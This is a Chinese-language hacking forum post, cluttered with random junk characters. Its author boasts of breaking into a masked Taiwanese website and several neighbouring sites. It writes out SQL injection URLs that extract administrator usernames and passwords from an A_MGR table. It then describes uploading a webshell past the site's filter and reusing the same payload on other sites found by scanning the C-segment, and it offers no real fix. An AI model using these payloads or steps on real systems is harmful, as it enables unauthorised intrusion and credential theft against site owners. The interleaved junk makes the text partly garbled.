发现一个注入点
7 M& V1 j; w H2 H* b" ^; U& ^http://www.xxx.com /Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389
( Q! u% } r5 B! {, o+ e5 D6 `8 v: u- r9 n: y% ?
习惯性的加’having1=1--, z H! p. t* t# \: P3 P
$ D: u3 R* Y# Khttp://www.xxx.com.tw/Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389’having 1=1—' f6 I" a7 W0 U8 |& m% }: d( R
5 Y& m4 C D, E8 K6 o
0) V3 l) C% U; N+ S# o+ n6 Z! I( c
. u+ d/ h! d$ _0 w6 t爆出Diary_A.dl_Title(这时候很激动啊) R W! i6 {2 V4 d/ z
" H; a. f+ G0 J5 @. b% c那么继续
5 t& Z& C% b' j$ [8 m7 J5 phttp://www.xxx.com.tw/Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389’group by dl_Title having 1=1—8 R+ N& J. \8 Z" J- K8 f# M
7 I7 Z }- c, T* j继续,一直爆下去, t6 r8 N8 ?0 x" n# W" j; i
* D2 g% z2 R* [
爆到几个字段和表段 但是没找到需要的管理用户的字段
- c2 Y/ x8 L; f" g' Q& E: s9 c; E. Z2 |% w
蛋疼了 怎么办 然后去后台登陆页看源码
1 ~( C. i, b; y/ m' ~' k/ [: F# P6 h' R% U$ X( g! i
0& R' x' W2 M) S9 `
/ D$ o- a- `8 j# U3 U) x7 G
Input name= “ADUID”
' B. b* @" |: N! t" e! w+ S7 f, C) `Input name= “ADPWD”
1 I( b7 {, [6 B- ?* y& F0 ]# M# h0 U: I6 u5 a. d) X# q! C8 B
很幸运 找到了字段那就继续
n6 J5 b0 v3 N找到之后开始爆用户
) L: ?3 X) T0 h& E5 khttp://www.xxx.com.tw/Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389'and(select top 1 MGR_UID from A_MGR)>0—! q3 D, x8 K, y2 z
爆密码; S) H3 ]( f) E0 `, J
http://www.xxx.com.tw/Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389'and(select top 1 MGR_PWD from A_MGR)>0—
& p6 q& r3 F3 y' V4 H测试了下 这个注入点只能爆到文章哪里的表 ; C5 n8 u. c6 o4 l7 H
0 g) P, r$ v0 A F9 G+ Q头疼 继续 既然只能报道文章哪里的表去后台爆 不过后台字符限制了: L1 C9 [6 v0 n k
/ Q* m5 W# G5 V4 O又想到 用户登录哪里也可以的吧就去试试 果然 今天我很幸运吧 爆出来了" i$ ~9 g! { @+ l6 W6 m
2 q7 [* i" @; \3 G6 J
473
2 ?% K6 ?; F6 r# M( E& ?2 f, f# S6 {
进后台, o0 _' J' J+ s1 X
9 _* T+ V: j9 ?( \
1 C% f# y2 ~$ f0 ]( g: k) ?: s6 A发现几个上传点 有的地方不能上传 而且防止恶意代码
3 O4 H' B% S9 }) D- O; ~8 e
A5 T2 A I; y1 L( }没办法 各种百度各种找大牛 找到一只好像可以突破的马
6 W! U+ v3 o' s; j" C7 G: a; ~" i8 ]( K4 e( d. F+ [) k& F2 k
0 u* N# C5 K0 ?+ m/ H* j
在系统管理那里直接上传 不过没有显示地址
+ H% C% y( w/ w- g" o6 Z) V, [* o2 F" N b0 n
再上传一次 抓包 搞定OK
8 b% k Y* g( Y6 z8 _$ l! I
: h) F( h K" S! }2 T2 b4 f! Y/ k; R# y/ C
: |6 |% J+ u' F" q
4721 ^' M3 ?/ f: R6 {& v* [& l
" T7 U5 d6 [7 Y晚上不行了 去睡觉。。。
. d9 w' S' j3 W- U第二天刚起床 闲的没事做继续日站吧 5 [1 Y" ?- t I9 R' J" I* g- f
. j3 B- ^2 l8 Y* X2 @找个站 就把这个站的旁c扫了下" w5 `; W, i, a6 K0 y% N
4 L W% ~0 b& _5 h1 a, I4 X
发现c段也有一个购物站 ,然后还和这个站的模板差不多1 L% M# _! Y Q
7 u) q: r- S8 P8 ^' n2 ]* e ?
就找到会员登录口测试
' K& ^8 t* W9 v. I! y2 B
1 |/ W2 l6 g" {8 |( b4 _7 T'and (select top 1 MGR_UID from A_MGR)>0—' W% ?$ T- y, Z+ D, M0 A$ x" d
果断爆到了 这时候我很激动 通杀! ^4 U$ @2 o6 L9 w
! `& a$ G2 t4 @( y% Y+ Y再次翻c段2 p$ G' v+ ?9 m/ e
) T! Q8 N! S9 e; \
翻出几个站 都成功拿下
7 p6 l" D* _' J* |# f* u9 S. E5 m; Z# s4 Z
K1 f/ \8 \ p4 |* {
# { ]/ _/ v0 h- d' ?修复方案:
; p/ n7 Y! e0 I* u他们比我专业
z& f/ J8 t- H! B2 Y! p& l0 O* G3 K( v# c- `
3 L0 j x+ y3 g- f% ?7 U L
! L) ?) \5 o) }" ]8 ] ^$ B) @ |